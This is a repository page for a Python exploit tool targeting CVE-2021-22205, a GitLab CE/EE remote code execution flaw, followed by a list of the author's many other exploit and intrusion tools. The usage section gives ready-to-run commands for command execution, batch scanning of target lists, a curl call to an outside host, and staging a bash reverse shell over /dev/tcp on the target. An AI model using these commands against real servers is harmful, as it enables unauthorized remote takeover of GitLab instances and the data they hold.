• Stars
    star
    246
  • Rank 164,726 (Top 4 %)
  • Language
    Python
  • Created about 3 years ago
  • Updated almost 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage
python3 CVE-2021-2205.py

img

Vuln check
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

img

command execute
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

attack

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

attack_command1

attack_command2

batch scan
python3 CVE-2021-2205.py -s true -f target.txt

scan_result

Reserve Shell
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

reverse_shell1

reverse_shell2

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

reverse_shell3

reverse_shell4

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

reverse_shell5

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

More Repositories

1

Pentest-tools

Intranet penetration tools
PowerShell
855
star
2

WindowsElevation

Windows Elevation(ๆŒ็ปญๆ›ดๆ–ฐ)
C
597
star
3

CSPlugins

Cobaltstrike Plugins
PowerShell
392
star
4

LinuxEelvation

Linux Eelvation(ๆŒ็ปญๆ›ดๆ–ฐ)
C
373
star
5

Red-Team

Red-Team Attack Guid
217
star
6

Information-Security

Information security
207
star
7

CVE-2021-22986

CVE-2021-22986 & F5 BIG-IP RCE
Python
88
star
8

Awesome-Pentest

Collection of penetration testing tools
79
star
9

CVE-2020-36179

CVE-2020-36179~82 Jackson-databind SSRF&RCE
77
star
10

Heptagram

This project is used to collect the EXP/POC disclosed on the Internet and provide project support for Heptagram security team.
C
75
star
11

CVE-2022-0847

CVE-2022-0847
C
60
star
12

CVE-2021-27928

CVE-2021-27928 MariaDB/MySQL-'wsrep provider' ๅ‘ฝไปคๆณจๅ…ฅๆผๆดž
56
star
13

Monitor

A old way to Persistence
C++
44
star
14

CVE-2020-35728

CVE-2020-35728 & Jackson-databind RCE
42
star
15

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE
Python
36
star
16

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE
Python
33
star
17

CVE-2021-2109

CVE-2021-2109 && Weblogic Server RCE via JNDI
Java
32
star
18

CVE-2020-17530

S2-061 CVE-2020-17530
Java
30
star
19

Map-of-IT-Architects-Technical-Knowledge

ITๆžถๆž„ๅธˆๆŠ€ๆœฏ็Ÿฅ่ฏ†ๅ›พ่ฐฑ
28
star
20

APT-GUID

APT-GUID
23
star
21

MysqlHoneypot

MysqlHoneypot
Python
23
star
22

BlockChainSec

BlockChain Security
Solidity
22
star
23

HW-2023

HW-POC
22
star
24

Pentest-Command

Pentest-Command
19
star
25

CVE-2020-36184

CVE-2020-36184 && Jackson-databind RCE
16
star
26

0DayList

0DayList
15
star
27

FastJsonAutoTypeBypass

FastJsonAutoTypeBypass
Java
14
star
28

CVE-2021-21975

CVE-2021-21975 vRealize Operations Manager SSRF
14
star
29

WebShells

WebShell studying
PHP
13
star
30

CVE-2021-30461

CVE-2021-30461
Python
13
star
31

Alibab-Nacos-Unauthorized-Login

Alibab Nacos Unauthorized Login
13
star
32

SelectMyParent

PPID Spoofing
HTML
13
star
33

CVE-2020-36188

CVE-2020-36188 &&Jackson-databind RCE
12
star
34

CVE-2020-5902

CVE-2020-5902
Java
11
star
35

CVE-2017-16995

CVE-2017-16995๏ผˆUbuntuๆœฌๅœฐๆๆƒๆผๆดž๏ผ‰
C
11
star
36

CheckPWD

Check the default pwd of product via checklist.
10
star
37

CVE-2017-7269

Ruby
10
star
38

SonicWall

SonicWall SSL-VPN RCE
Python
10
star
39

CVE-2019-0230

S2-059(CVE-2019-0230)
Java
10
star
40

TongDa-RCE

้€š่พพๆ–‡ไปถๅŒ…ๅซ+ๆ–‡ไปถไธŠไผ ๅฏผ่‡ดRCE
PHP
10
star
41

RemoteDLLInjector

RemoteDLLInjector
8
star
42

php_mt_seed

php_mt_seed is a PHP mt_rand() seed cracker
7
star
43

CVE-2020-10673

CVE-2020-10673:jackson-databind RCE
Java
6
star
44

RDPLinkEnum

RDPLinkEnum
PowerShell
6
star
45

CVE-2020-13937

Apache Kylin API Unauthorized Access
6
star
46

CVE-2020-2883

CVE-2020-2883
Java
6
star
47

CVE-2020-35729

CVE-2020-35729
Python
6
star
48

EmergencyTools

EmergencyTools
6
star
49

CVE-2020-11652

CVE-2020-11652 & CVE-2020-11651
Python
5
star
50

SoliditySecurity

Solidity Security
5
star
51

CVE-2017-3506

CVE-2017-3506
5
star
52

JEP290_RMI_Bypass

JEP290_RMI_Bypass
Java
4
star
53

Rogue-MySql-Server

Rogue-MySql-Server
Python
4
star
54

CVE-2020-11113

CVE-2020-11113:Jackson-databind RCE
Java
4
star
55

BlockChainConstruction

BlockChain Security Construction
4
star
56

LM-HASH

LM-HASH
Python
4
star
57

CVE-2020-17456

CVE-2020-17456 & Seowon SLC 130 Router RCE
Python
4
star
58

CVE-2019-12814

CVE-2019-12814:Jackson JDOM XSLTransformer Gadget
Java
4
star
59

Alibab-Nacos-Unauthorized-Reset-PWD

Alibab-Nacos-Unauthorized-Reset PWD
4
star
60

CVE-2021-34045

Novel-plus-install-v3.5.3-Druid Unauthorized access
4
star
61

PSTools

PSTools
3
star
62

reDuh

reDuhServers
ASP.NET
3
star
63

WCE

Window Hash&Password dump
3
star
64

CVE-2020-26217

CVE-2020-26217 && XStream RCE
3
star
65

ExtensionHijack

ExtensionHijack
C++
3
star
66

CVE-2021-3317

CVE-2021-3317
Python
3
star
67

CVE-2017-17485

CVE-2017-17485:Jackson-databind RCE
Java
3
star
68

GPOCrack

Active Directory Group Policy Preferences cpassword cracker/decrypter.
Python
3
star
69

MakeMeEnterpriseAdmin

MakeMeEnterpriseAdmin
PowerShell
3
star
70

CVE-2021-4034

Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
C
3
star
71

AdFind

AdFind
Perl
3
star
72

Hook-PasswordChangeNotify

Hook PasswordChangeNotify
PowerShell
2
star
73

CVE-2020-14195

This is a simple test for FasterXML jackson-databind
Java
2
star
74

EvilReflex

EvilReflex
Solidity
2
star
75

CVE-2019-12086

jackson unserialize
Python
2
star
76

CVE-2020-8635

Wing FTP Server 6.2.3 - Privilege Escalation
Python
2
star
77

ICMPTunnel

icmptunnel
C
2
star
78

JavaDeRe

Class to base64 String๏ผŒbase64 String to class
Java
2
star
79

Powershell-C2

Powershell-C2
PowerShell
2
star
80

CVE-2020-24750

CVE-2020-24750
Java
2
star
81

Invoke-DCSync

Invoke-DCSync
PowerShell
2
star
82

CVE-2020-26259

CVE-2020-26259 &&XStream Arbitrary File Delete
2
star
83

Al1ex

2
star
84

CVE-2017-10271

CVE-2017-10271
Python
2
star
85

CVE-2019-17571

Environment for CVE_2019_17571
Java
2
star
86

CVE-2020-35713

CVE-2020-35713
Python
2
star
87

CVE-2020-9470

Wing FTP Server 6.2.5 - Privilege Escalation
Shell
1
star
88

Asmtools

Asmtools
1
star
89

Redis-RCE

Redis 4.x/5.x RCE
Python
1
star
90

SSHServer

SSHServer
Go
1
star
91

Mysql-Readfile

Mysql-Readfile
Python
1
star
92

CVE-2018-1297

EXP for CVE-2018-1297
Python
1
star
93

PowerShellProfiler

PowerShellProfiler
Python
1
star
94

JEP290Test

Bypass JEP290 Test
Java
1
star
95

DoubanMovieTop

Use the scrapy framework to climb the top 250 movies of Douban
Python
1
star
96

Shiro-basic

This is a simple Shiro-basic project .Just for pentest env
Java
1
star
97

CVE-2020-26258

CVE-2020-26258 && XStream SSRF
Java
1
star
98

JMXAttacking

JMXTest
Java
1
star